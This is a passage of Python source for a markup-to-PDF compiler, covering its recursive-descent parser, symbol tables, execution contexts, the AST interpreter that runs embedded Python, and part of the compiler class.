are multiple possibilities as to where the errors my be coming from such as in the writing rule of this language's grammar. This affinity can be used to see whether any of the rules applied or not because if non of them did, then the parser is probably just at the end of the file. """ self.affinity += amt def success(self, node): self.node = node return self def failure(self, error): if not self.error or self.last_registered_advance_count == 0: self.error = error return self class Parser: """ Creates an Abstract Syntax Tree based on the rules in grammar.txt. Look at grammar.txt for the outline of what the Parser is trying to do. It takes each rule and recursively tries to make it work. When a rule does not work, it returns a ParseResult with an error in ParseResult.error. In the case of the error, the index is changed back to what it was before the Parser tried the rule. If there was no error, then the Node that was successfully created by the rule is returned. This Parser uses a top-down approach to parsing, as opposed to a bottom-up approach to parsing, which is a far harder method of parsing to write a Parser for. """ def __init__(self, tokens, print_progress_bar=False): # Progress Printing Info self._print_progress_bar = print_progress_bar self._tokens_len = len(tokens) file_path = '' if self._tokens_len == 0 else tokens[0].start_pos.file_path self._progress_bar_prefix = prog_bar_prefix('Parsing', file_path) self._prog_bar_refresh = calc_prog_bar_refresh_rate(self._tokens_len) # Things needed to actually parse the tokens self._tokens = tokens self._tok_idx = -1 self._current_tok = None self._advance() def parse(self): """ Returns a ParseResult with either an error in res.error or a node in res.node """ if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) if self._current_tok.type == TT.FILE_START: res = self._file() else: res = self._document() if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) return res # ------------------------------ # Main Helper Methods def _advance(self, parse_result=None): """ Advances to the next token. It returns the token before the new one and registers an advancement with the given parse_result for convenience. """ prev_token = self._current_tok if parse_result: parse_result.register_advancement() self._tok_idx += 1 self._update_current_tok() return prev_token def _reverse(self, parse_result): self._tok_idx -= parse_result.reversing() self._update_current_tok() def _update_current_tok(self): if self._tok_idx >= 0 and self._tok_idx < len(self._tokens): self._current_tok = self._tokens[self._tok_idx] else: # TT.NONE_LEFT will NOT match any Tokens needed for any rule, # forcing an error to occur in each rule and the rules to # terminate. This is much safer than just not changing the token # any more when you run out of tokens to parse because now, even if # you have a low-level rule that will accept infinitely many of a # token of a certain type, that type will not be infinitely given # if the list of tokens ends on it if self._current_tok is not None: self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy()) else: dummy_start_pos = DUMMY_POSITION.copy() dummy_end_pos = dummy_start_pos.copy() self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', dummy_start_pos, dummy_end_pos) # ------------------------------ # Rules def _file(self): """ A document but with a FILE_START token at the beginning and a FILE_END token at the end. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() if self._current_tok.type == TT.FILE_START: file_start = self._advance(res) else: return res.failure(InvalidSyntaxError(start_pos, start_pos.copy().advance(), 'For some reason, your file does not begin with a FILE_START Token. This is a Compiler Error, so contact the developer and let them know.')) document = res.register(self._document()) if res.error: return res if self._current_tok.type == TT.FILE_END: file_end = self._advance(res) else: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Reached the end of the file but there was no FILE_END Token. The file must have Invalid Syntax or the compiler is having issues.\nALL TOKENS: {self._tokens}\n\nLAST TOKEN SEEN: {self._current_tok}\n\nLast Token Seen Index: {self._tok_idx}')) return res.success(FileNode(file_start, document, file_end)) def _document(self): """ A document is a group of paragraphs, essentially. """ res = ParseResult() paragraphs = [] # will eat token if there, otherwise nothing self._eat_pb(res) print_prog_bar = self._print_progress_bar if print_prog_bar: refresh = self._prog_bar_refresh toks_len = self._tokens_len prefix = self._progress_bar_prefix while True: # paragraph will be None if the try failed, otherwise it will be the # new ParagraphNode result = self._paragraph() if result.error and result.affinity > 0: res.register(result) return res paragraph = res.register_try(result) # If, when we tried to make another paragraph, it failed, # that means that there are no more paragraphs left in the # document, so undo the try by going back the number of # tokens that the try went forward if not paragraph: self._reverse(res) break else: if print_prog_bar: i = self._tok_idx if (i % refresh) == 0: print_progress_bar(i, toks_len, prefix) paragraphs.append(paragraph) self._eat_pb(res) return res.success(DocumentNode(paragraphs)) def _paragraph(self): """ A peice of writing, with a paragraph break before it possibly. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() # Check for Paragraph Break paragraph_break = self._eat_pb(res) # Check for Writing writing = res.register(self._writing()) if res.error: return res # writing should be a WritingNode and paragraph_break is a Token of # type PARAGRAPH_BREAK return res.success(ParagraphNode(paragraph_break, writing)) def _writing(self): """ A peice of writing such as something to run in python, a command def or command call, text group, or pain text. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() results = [] new_res = self._python() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_def() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_call() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._plain_text() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._text_group() results.append(new_res) writing = res.register_try(new_res) if not writing: best_result = None for result in results: if result.affinity > 0 and ((not best_result) or result.affinity > best_result.affinity): best_result = result if not best_result: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'There was no writing, but writing was expected.' )) else: return res.failure(best_result) # writing should be either a PythonNode or a PlainTextNode return res.success(WritingNode(writing)) def _python(self): """ This fulfills the python rule of the grammar. """ res = ParseResult() ct = self._current_tok type = self._current_tok.type # Python Switch Statement to figure out whether the token is a Python Token try: python = { TT.EXEC_PYTH1: ct, TT.EVAL_PYTH1: ct, TT.EXEC_PYTH2: ct, TT.EVAL_PYTH2: ct }[ct.type] except KeyError: return res.failure(InvalidSyntaxError(ct.start_pos.copy(), ct.start_pos.copy().advance(), 'Expected a Token of Type PASS1EXEC, PASS1EVAL, PASS2EXEC, or PASS1EVAL but did not get one.') ) self._advance(res) # python should be a single python Token of type PASS1EXEC or PASS2EXEC # or PASS1EVAL or PASS2EVAL return res.success(PythonNode(python)) def _cmnd_def(self): """ A command definition. For example: \\hi = (\\first_name, \\last_name={}) { Hello \\first_name \\last_name } """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) equal_sign = res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) cmnd_params = [] # (OPAREN PB? (cmnd_params PB? (COMMA PB? cmnd_params)*)? PB? CPAREN)? oparen = res.register_try(self._need_token(TT.OPAREN)) if oparen: res.add_affinity() self._eat_pb(res) cmnd_param = res.register_try(self._cmnd_param()) if not cmnd_param: self._reverse(res) else: res.add_affinity() cmnd_params.append(cmnd_param) while True: self._eat_pb(res) comma = res.register_try(self._need_token(TT.COMMA)) if not comma: self._reverse(res) break res.add_affinity() cmnd_param = res.register(self._cmnd_param()) if res.error: return res.failure(InvalidSyntaxError( comma.start_pos.copy(), comma.end_pos.copy(), 'Extra comma. You need to either have a variable name after it or remove it.' )) res.add_affinity() cmnd_params.append(cmnd_param) self._eat_pb(res) cparen = res.register(self._need_token(TT.CPAREN)) if res.error: return res.failure(InvalidSyntaxError( oparen.start_pos, oparen.end_pos, 'You need to have a matching closing parenthesis ")" to match this parenthisis after your parameters for the Command Definition.' )) res.add_affinity() self._eat_pb(res) # text_group text_group = res.register(self._text_group()) if res.error: return res.failure(InvalidSyntaxError( self._current_tok.start_pos, self._current_tok.end_pos, 'Here, you need to have a pair of curly brackets "{}", at the very least, in order to finish off this command definition.' )) res.add_affinity() cmnd_tex_params = [] cmnd_key_params = [] for param in cmnd_params: if isinstance(param, CommandParamNode): cmnd_tex_params.append(param) elif isinstance(param, CommandKeyParamNode): cmnd_key_params.append(param) else: raise Exception(f'This was outputted as a command parameter but is not one: {param}') return res.success(CommandDefNode(cmnd_name, cmnd_tex_params, cmnd_key_params, text_group)) def _cmnd_param(self): """ A command Parameter. So either \\hi = {a default value} or \\hi """ res = ParseResult() self._eat_pb(res) text_group = res.register_try(self._cmnd_key_param()) if text_group: return res.success(text_group) self._reverse(res) text_group = res.register_try(self._cmnd_tex_param()) if text_group: return res.success(text_group) else: self._reverse(res) return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Parameter here.')) def _cmnd_key_param(self): """ A command parameter so \\hi = {a default value} """ res = ParseResult() self._eat_pb(res) key = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandKeyParamNode(key, text_group)) def _cmnd_tex_param(self): """ A command parameter that is just an IDENTIFIER """ res = ParseResult() ident = res.register(self._need_token(TT.IDENTIFIER)) res.add_affinity() if not ident: return res else: return res.success(CommandParamNode(ident)) def _cmnd_call(self): """ A command call like \\hi or \\hi{FirstName}{\\last_name={LastName}} """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() args = [] while True: arg = res.register_try(self._cmnd_arg()) if not arg: self._reverse(res) break res.add_affinity() args.append(arg) cmnd_tex_args = [] cmnd_key_args = [] for arg in args: if isinstance(arg, CommandTexArgNode): cmnd_tex_args.append(arg) elif isinstance(arg, CommandKeyArgNode): cmnd_key_args.append(arg) else: raise Exception(f'Expected a command argument Node, instead got: {arg}') return res.success(CommandCallNode(cmnd_name, cmnd_tex_args, cmnd_key_args)) def _cmnd_arg(self): """ A cmnd argument such as {FirstName} or {\\first_name={FirstName}} in \\hi{FirstName}{\\first_name={FirstName}} """ res = ParseResult() arg = res.register_try(self._cmnd_key_arg()) if arg: return res.success(arg) self._reverse(res) arg = res.register_try(self._cmnd_tex_arg()) if arg: return res.success(arg) self._reverse(res) return res.failure(InvalidSyntaxError( self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Argument here.' )) def _cmnd_tex_arg(self): """ A command text argument \\he{FirstName} """ res = ParseResult() text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandTexArgNode(text_group)) def _cmnd_key_arg(self): """ A command key argument such as {\\first_name={FirstName}} in \\he{\\first_name={FirstName}} """ res = ParseResult() res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() ident = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(CommandKeyArgNode(ident, text_group)) def _text_group(self): """ A text group is { document } """ res = ParseResult() ocb = res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() document = res.register(self._document()) if res.error: return res res.add_affinity() ccb = res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(TextGroupNode(ocb, document, ccb)) def _plain_text(self): res = ParseResult() plain_text = [] while True: cc = self._current_tok start_pos = cc.start_pos # Python Switch Statement try: new_tok = { TT.BACKSLASH: cc, TT.EQUAL_SIGN: cc, TT.COMMA: cc, TT.OPAREN: cc, TT.CPAREN: cc, TT.OBRACE: cc, TT.CBRACE: cc, TT.WORD: cc }[cc.type] # If I remember correctly, you cannot directly wrap the dict # in this append method because it appends the error # to the list when there is an error, which is problematic plain_text.append(new_tok) res.add_affinity() except KeyError: break self._advance(res) if len(plain_text) == 0: return res.failure(InvalidSyntaxError(start_pos.copy(), start_pos.copy().advance(), 'Expected atleast 1 WORD, BACKSLASH, OCBRACE, CCBRACE, or EQUAL_SIGN Token.' ) ) # plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens # in any order. return res.success(PlainTextNode(plain_text)) # ------------------------------------------------------------------------- # Non-Rule Lesser Help Methods def _eat_pb(self, parse_result): """ Eat a PARAGRAPH_BREAK A helper method that, unlike the other methods, just exists because there are many rules with PARAGRAPH_BREAK? in them. This method does that, returning None if the current token is not a PARAGRAPH_BREAK and the PARAGRAPH_BREAK Token if there is one. If a PARAGRAPH_BREAK token is found, the method also advances past past it. """ par_break = None if self._current_tok.type == TT.PARAGRAPH_BREAK: par_break = self._advance(parse_result) return par_break def _need_token(self, token_type): """ A helper method that just checks that a token exists right now. Will return a ParseResult with an error if the token is not the required one and a ParseResult with the node of the result being the token if the current token is the correct one. This method exists not because there is a Node for it (there is not one) but because what this method does is something that needs to be done a lot in the parse methods. """ res = ParseResult() if not (self._current_tok.type == token_type): return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Expected a Token of type {token_type}, but got token {self._current_tok}')) return res.success(self._advance(res)) # ----------------------------------------------------------------------------- # Interpreter and Related Classes class RunTimeResult: """ Wraps a return value in the Interpreter so that, when a visit method finishes visiting a Node, it can tell the Node that visited it various things such as whether to return immediately or not. """ __slots__ = ['value', 'error'] def __init__(self): self.reset() def reset(self): self.value = None self.error = None def register(self, res): """ Register the returned result from a Node you just visited. This way, if you should return because an error occured or something, you can. """ self.error = res.error return res.value def success(self, value): self.reset() self.value = value return self def failure(self, error): self.reset() self.error = error return self class SymbolTable: """ The symbol table is used to store the commands. """ def __init__(self, parent=None): self.symbols = {} self.parent = parent def get(self, name): """ Returns the value for the name if it is in the SymbolTable, None otherwise """ value = self.symbols.get(name, None) if value == None and self.parent: return self.parent.get(name) return value def set(self, name, value): """ Sets a the value for a name in the symbol table """ self.symbols[name] = value def remove(self, name): """ Removes a name from the symbol table. """ self.symbols.pop(name) def import_(self, other_symbol_table, commands_to_import=None): """ Imports the symbols of the other symbol table into this one. If commands_to_import is None, then import every command. Otherwise, only import the commands with the names listed. """ if commands_to_import is None: self.symbols.update(other_symbol_table.symbols) else: oth_syms = other_symbol_table.symbols for command_name in commands_to_import: if command_name in oth_syms: self.symbols[command_name] = oth_syms[command_name] else: raise AssertionError(f'Could not import {command_name}.') def copy(self): import copy new = SymbolTable(None if self.parent is None else self.parent.copy()) new.symbols = copy.deepcopy(self.symbols) return new def __repr__(self): string = f'\n{type(self).__name__}(' string += f'symbols={self.symbols}' string += ')' return string class Context: """ Provides Context for every command/amount of python code that is run. By that I mean that the Context determines what commands and variables are available and when. """ __slots__ = ['display_name', 'file_path', 'entry_pos', 'parent', '_globals', '_locals', 'symbols', '_token_document', 'global_level'] def __init__(self, display_name, file_path, parent=None, entry_pos=None, token_document=None, globals=None, locals=None, symbol_table=None): """ Context could be a function if in a function or the entire program (global) if not in a function. """ self.display_name = display_name # the command/program name self.file_path = file_path # the path to the file that the command is in self.entry_pos = entry_pos # the position in the code where the context changed (where the command was called) self.parent = parent # Parent context if there is one # These are the globals and locals used by Python. The SymbolTable is # used for Commands, not these self._globals = globals # dict or None self._locals = locals # dict or None # Make sure that there are globals self.globals() # will throw an error if there are no globals, even in parent contexts if symbol_table is not None: assert_instance(symbol_table, SymbolTable, or_none=False) self.symbols = symbol_table # SymbolTable elif parent is not None and parent.symbols is not None: self.symbols = SymbolTable(parent.symbols) else: self.symbols = SymbolTable() if token_document is not None: self._token_document = token_document else: self._token_document = [] self.global_level = True def __repr__(self): string = f'\n{type(self).__name__}(\n' string += f'\tdisplay_name={self.display_name}' string += f'\tsymbols={self.symbols}' string += f'\tglobals={self._globals}' string += f'\tlocals={self._locals}' string += f'\tparent={self.parent}' string += '\n)' return string def copy(self): _globals = None if self._globals is None else {key:val for key, val in self._globals.items()} _locals = None if self._locals is None else {key:val for key, val in self._locals.items()} entry_pos = None if self.entry_pos is None else self.entry_pos.copy() parent = None if self.parent is None else self.parent.copy() new = Context(self.display_name, self.file_path, parent, entry_pos, self._token_document[:], _globals, _locals) new.symbols = self.symbols.copy() return new def gen_child(self, child_display_name:str, child_entry_pos=None, locals_to_add=None): """ Generates a child context i.e. a subcontext such as that which is inside a command. locals_to_add are things like the \\test variable below, which should be made available to any Python Code that is inside the command \\# Global Context \\hello = (\\test) = { \\# This should have a subcontext where commands can be defined in \\# here but not mess with those defined in the global context/ \\# any parent context \\test \\# is defined in this child context } \\# \\test is undefined here, in this global context """ # Generate the new python locals. Because only one locals dict can be # passed to an exec or eval method at a time, it must have all the # references to parent locals in it so that it works as if it could # look up the locals hierarchy as the SymbolTables do for Commands # In other words, the child Context's locals must be a superset of this # Context's locals child_lcls = {} if (self._locals is None) else {key:val for key, val in self._locals.items()} if locals_to_add: child_lcls.update(locals_to_add) parent = self # Give the new context a reference to globals so that it does not have # to walk up a bunch of parents to get it anyway child = Context(child_display_name, self.file_path, parent, child_entry_pos, self.token_document(), self.globals(), child_lcls, SymbolTable(self.symbols)) child.global_level = False return child def import_(self, other_context, tokens_to_import=[], commands_to_import=None): """ Takes another context and imports its contents into this one. """ self.symbols.import_(other_context.symbols, commands_to_import) self.globals().update(other_context.globals()) self.token_document().extend(tokens_to_import) def globals(self): if self._globals is not None: return self._globals elif self.parent is not None: return self.parent.globals() else: raise Exception("You did not pass in globals to the Global Context.") def locals(self): return self._locals def token_document(self): """ The list of tokens that should be given to the Placer object to actually make the PDFDocument. """ return self._token_document def set_token_document(self, new_doc): self._token_document = new_doc class InterpreterFlags: """ Flags for the Interpreter so that it can know what to do when it does a pass over an Abstract Syntax Tree created by the Parser. The difference between these flags and the context in the Interpreter is that things in the flags stay the same for the entire AST pass whereas the things in the context could change at each visit to a node. """ def __init__(self): pass class Interpreter: """ The interpreter visits each node in the Abstract Syntax Tree generated by the Parser and actually runs the corresponding code for the node. """ def __init__(self): self._context_stack = [] self._curr_context = None self._command_node_stack = [] self._curr_command_node = None def _push_context(self, context): self._context_stack.append(context) self._curr_context = context def _pop_context(self): self._context_stack.pop() self._curr_context = self._context_stack[-1] if len(self._context_stack) > 0 else None def curr_context(self): return self._curr_context def _push_command_node(self, command_node): self._command_node_stack.append(command_node) self._curr_command_node = command_node def _pop_command_node(self): self._command_node_stack.pop() self._curr_command_node = self._command_node_stack[-1] if len(self._command_node_stack) > 0 else None def curr_command_node(self): return self._curr_command_node def visit_root(self, node, context, flags, print_progress=False): """ The visit to the root node of an AST. """ if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Running AST for ', f'{context.display_name}', align='>', suffix='', append='...')) prev_context = self._curr_context self._curr_context = context result = self.visit(node, context, flags) self._curr_context = prev_context if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Done Running AST for ', context.display_name, align='>', suffix='', append='')) return result def visit(self, node, context, flags): method_name = f'_visit_{type(node).__name__}' method = getattr(self, method_name, self._no_visit_method) return method(node, context, flags) def _no_visit_method(self, node, context, flags): raise Exception(f'No _visit_{type(node).__name__} method defined in Interpreter') # ------------------------------ # Rule Implementations def _visit_FileNode(self, node, context, flags): res = RunTimeResult() result = res.register(self.visit(node.document, context, flags)) if res.error: return res return res.success(result) def _visit_DocumentNode(self, node, context, flags): res = RunTimeResult() document = [] was_global = context.global_level if was_global: context.global_level = False for paragraph in node.paragraphs: write_tokens = res.register(self.visit(paragraph, context, flags)) if res.error: return res else: if was_global: context.token_document().extend(write_tokens) document.extend(write_tokens) if was_global: context.global_level = True return res.success(document) def _visit_ParagraphNode(self, node, context, flags): res = RunTimeResult() # How long the document has gotten so far i = len(context.token_document()) # Visit the writing (could be Plaintext, Python, command def, or a Command call) write_tokens = res.register(self.visit(node.writing, context, flags)) if res.error: return res if len(write_tokens) > 0: # Command was called and this Class was used to make the length # of the write_tokens > 0 because a command was called if write_tokens[0] == Interpreter.CommandCalled: write_tokens.pop(0) if node.paragraph_break: # Add the paragraph break to before the current text was added context.token_document().insert(i, node.paragraph_break) return res.success(write_tokens) def _visit_WritingNode(self, node, context, flags): """ Visits a WritingNode. If successful, this method will return a string of what the ParagraphNode is supposed to write. """ res = RunTimeResult() write_tokens = res.register(self.visit(node.writing, context, flags)) # Error Handling if res.error: return res return res.success(write_tokens) def _visit_PythonNode(self, node, context, flags): res = RunTimeResult() python_token = node.python tt = python_token.type # Execute or eval python if tt == TT.EXEC_PYTH1: python_result = exec_python(python_token.value, context.globals(), context.locals()) elif tt == TT.EVAL_PYTH1: python_result = eval_python(python_token.value, context.globals(), context.locals()) # For second pass python, it needs to be kept until we are actually # placing the text on the PDF, then the Placer will be made available # to the python and the code can make changes to the PDF elif tt in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): python_result = [python_token.gen_pass_2_python( \ None if context.locals() is None else \ {key:val for key, val in context.locals().items()})] else: raise Exception(f"The following token was found in a PythonNode, it is not supposed to be in a PythonNode: {tt}") if isinstance(python_result, type(None)): python_result = [] elif isinstance(python_result, str): python_result = Tokenizer.plaintext_tokens_for_str(python_result) elif isinstance(python_result, MarkedUpText): python_result = Tokenizer.tokens_for_marked_up_text(python_result) elif isinstance(python_result, Exception) or issubclass(type(python_result), Exception): return res.failure(PythonException(node.start_pos.copy(), node.end_pos.copy(), 'An error occured while running your Python code.', python_result, context)) return res.success(python_result) def _visit_CommandDefNode(self, node, context, flags): res = RunTimeResult() cmnd_name = node.cmnd_name.value cmnd_params = node.cmnd_params cmnd_key_params = node.cmnd_key_params text_group = node.text_group context.symbols.set(cmnd_name, Command( cmnd_params, cmnd_key_params, text_group )) return res.success([]) def _visit_CommandCallNode(self, node, context, flags): res = RunTimeResult() tokens = [] cmnd_name_str = node.cmnd_name.value command_to_call = context.symbols.get(cmnd_name_str) self._push_command_node(node) if command_to_call is None: # The command is undefined return res.failure(RunTimeError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), '"\\' + f'{cmnd_name_str}" is undefined.', context )) elif isinstance(command_to_call, TextGroupNode): # Handle when the "command" is actually a parameter that contains # text. For example, in # # \hello = (\test) { # \test # } # # \test is a actually storing a TextGroupNode when the command # \hello is called, so this method handles returning the TextGroupNode # that that \test contains when \test is called result = res.register(self.visit(command_to_call, context, flags)) if res.error: return res if result: tokens.extend(result) else: # Command is defined and we need to call it min_args = len(command_to_call.params) max_args = min_args + len(command_to_call.key_params) num_positional_args = len(node.cmnd_tex_args) num_key_args = len(node.cmnd_key_args) num_args_given = num_positional_args + num_key_args # Check if enough positional arguments were given if num_positional_args < min_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command requires {min_args} argument(s), but {num_positional_args} was/were given.', )) # Check if too many arguments were given if num_args_given > max_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command takes {max_args} argument(s) max, but {num_args_given} was/were given.', )) cmnd_args = {} # Add all the command names first cmnd_and_key_param_names = [] for param in command_to_call.params: name = param.identifier.value if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) # Take each Parameter key-value pair (so the key-value pairs # in the definition of the command) and add them to the dict for cmnd_key_param in command_to_call.key_params: name = cmnd_key_param.key.value # Now add the key-params because the positional arguments will # fullfill parameters and key-parameters in the order that # they are in cmnd_and_key_param_names if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) cmnd_args[name] = cmnd_key_param.text_group # Now replace those key-value pairs from the definiton of the command # with those given in the call of command for key_arg in node.cmnd_key_args: # key params CommandKeyParamNode key = key_arg.key.value if not (key in cmnd_args): return res.failure(InvalidSyntaxError(key_arg.key.start_pos.copy(), key_arg.key.end_pos.copy(), f'"{key}" is not defined in command "{cmnd_name_str}". In other words, this key is not defined as a key-argument in the command\'s definition.', )) cmnd_args[key] = key_arg.text_group # now take each name from the POSITIONAL-ARGUMENT names provided in # the command's definition and provide the values for them from # the command call for param_name, arg in zip(cmnd_and_key_param_names, node.cmnd_tex_args): # params are CommandParamNode cmnd_args[param_name] = arg.text_group # Init py_locals, the python local variables to add to the current # context py_locals = {} for key, arg in cmnd_args.items(): # Visit the argument node and get the tokens from it new_tokens = res.register(self.visit(arg, context, flags)) if res.error: return res # Convert the tokens to MarkedUpText, something that can be used # in Python marked_up_text = Tokenizer.marked_up_text_for_tokens(new_tokens) if marked_up_text == '<NONE>': marked_up_text = None # Assign each python local to its marked_up_text py_locals[key] = marked_up_text child_context = context.gen_child(cmnd_name_str, node.start_pos.copy(), py_locals) # Just check to make sure that a value has been passed for each needed argument for key, value in cmnd_args.items(): if value == 0: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'"{key}", an argument in {cmnd_name_str}, has no value. You need to pass in an argument for it in this call of the command.', )) else: child_context.symbols.set(key, value) self._push_context(child_context) # actually run the command now that its variables have been added to the context result = res.register(self.visit(command_to_call.text_group, child_context, flags)) if res.error: return res tokens = result self._pop_context() self._pop_command_node() if len(tokens) > 0: # Find the first Token and set space_before to True if the # command call had space_before = True, otherwise set it False for token in tokens: if isinstance(token, Token): token.space_before = node.cmnd_name.space_before break # Tells the Paragraph Node that a Command was called so that it can # decide whether to insert a paragraph break depending on whether # there was one before the Command was called or not tokens.insert(0, Interpreter.CommandCalled) return res.success(tokens) def _visit_TextGroupNode(self, node, context, flags): res = RunTimeResult() doc_tokens = res.register(self.visit(node.document, context, flags)) if res.error: return res for token in doc_tokens: if isinstance(token, Token): token.space_before = node.ocbrace.space_before break return res.success(doc_tokens) def _visit_PlainTextNode(self, node, context, flags): res = RunTimeResult() return res.success(node.plain_text) # ----------------------------- # Helper Classes class CommandCalled: """ A helper class that just tells the Paragraph Node that a Command was called so that it can make an imformed decision on whether to add a paragraph break """ pass # ----------------------------------------------------------------------------- # Compiler Class class CompilerProxy: """ The actual object that is given to files being compiled named 'compiler'. The reason this object is given and not the actual compiler because this makes it clear what methods are actually meant to be used in the files being compiled. """ def __init__(self, compiler): self._compiler = compiler # --------------------------------- # Methods for Directory/File Finding def main_file_path(self): """ The path to the main/input file that the compiler started with. """ return self._compiler.main_file_path() def main_file_dir(self): """ The directory that the main/input file is in. """ return self._compiler.main_file_dir() def curr_file_path(self): """ The path to the file that is currently being compiled i.e. the file that you are in when you call this method. """ return self._compiler.curr_file_path() def curr_file_dir(self): """ The directory that the current file being run is in. """ return self._compiler.curr_file_dir() # --------------------------------- # Methods for importing/inserting files def strict_import_file(self, file_path): self._compiler.strict_import_file(file_path) def std_import_file(self, file_path): self._compiler.std_import_file(file_path) def import_file(self, file_path): self._compiler.import_file(file_path) def far_import_file(self, file_path): self._compiler.far_import_file(file_path) def insert_file(self, file_path): self._compiler.insert_file(file_path) def strict_insert_file(self, file_path): self._compiler.strict_insert_file(file_path) def far_insert_file(self, file_path): self._compiler.far_insert_file(file_path) # --------------------------------- # Other Methods def placer_class(self): return self._compiler.placer_class() def set_placer_class(self, placer_class): return self._compiler.set_placer_class(placer_class) class Compiler: """ This object orchestrates the compilation of plaintext files into PDFs """ def __init__(self, input_file_path, path_to_std_dir, print_progess_bars=False, encoding='utf-8'): self._commands = {} self._files_by_path = {} assert path.isfile(input_file_path), f'The given path is not to a file or does not exist: {input_file_path}' self._input_file_path = input_file_path self._input_file_dir = path.dirname(input_file_path) self._std_dir_path = path_to_std_dir self._print_progress_bars = print_progess_bars self._encoding = encoding # The encoding that the pdfo files are in self._toolbox = ToolBox(self) self._compiler_poxy = CompilerProxy(self) self._placer_class = NaivePlacer self._interpreter_stack = [] # The globals that will be copied every time a fresh set of globals # is needed self._globals = {'__name__': __name__, '__doc__': None, '__package__': None, '__loader__': __loader__, '__spec__': None, '__annotations__': None, '__builtins__': _copy.deepcopy(globals()['__builtins__']), 'compiler':self._compiler_poxy, 'toolbox':self._toolbox} # remove any problematic builtins from the globals rem_builtins = [] for key in rem_builtins: self._globals['__builtins__'].pop(key) # ------------------------------------------------------------------------- # Main Methods def compile_pdf(self): """ Compiles the PDF and returns the PDFDocument that can be used to draw the PDF multiple times to different files. """ fresh_context = self._fresh_context(self._input_file_path) # Now run the main\input file self._insert_file(self._input_file_path, fresh_context, print_progress=self._print_progress_bars) from placer.token_stream import TokenStream return TokenStream(fresh_context.token_document(), self._placer_class, fresh_context.globals(), self._input_file_path, self._print_progress_bars).place_tokens() def compile_and_draw_pdf(self, output_pdf_path): """ Convenience function that compiles and draws the PDF """ self.compile_pdf().draw(output_pdf_path, print_progress=self._print_progress_bars) # ------------------------------------------------------------------------- # Helper Methods def _fresh_globals(self): """ Returns a fresh set of globals as they are before the program starts compiling. These globals are for the python exec and eval methods that are used to run python code. """ return {key:val for key, val in self._globals.items()} def _fresh_context(self, file_path): """ Returns a fresh context for running a file as if it were the main/input file (even if it isn't actually the main/input file). """ parent = None; entry_pos = None; token_document = []; locals = None context = Context(file_path, file_path, parent, entry_pos, token_document, self._fresh_globals(), locals, SymbolTable()) # insert the standard file into the context self._insert_file(self._path_to_std_file(STD_LIB_FILE_NAME), context, print_progress=self._print_progress_bars) return context def _push_interpreter(self): """ Pushes a new Interpreter onto the interpreter stack. """ self._interpreter_stack.append(Interpreter()) def _pop_interpreter(self): """ Pops the _curr_interpreter off the interpreter stack. """ return self._interpreter_stack.pop() def _curr_interpreter(self): """ Returns the current Interpreter. """ _is = self._interpreter_stack return None if len(_is) <= 0 else _is[-1] def _curr_context(self): """ Returns the current Context. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_context def _curr_tok_document(self): """ Returns the current document made of tokens, not to be confused with the PDFDocument object that is returned by the 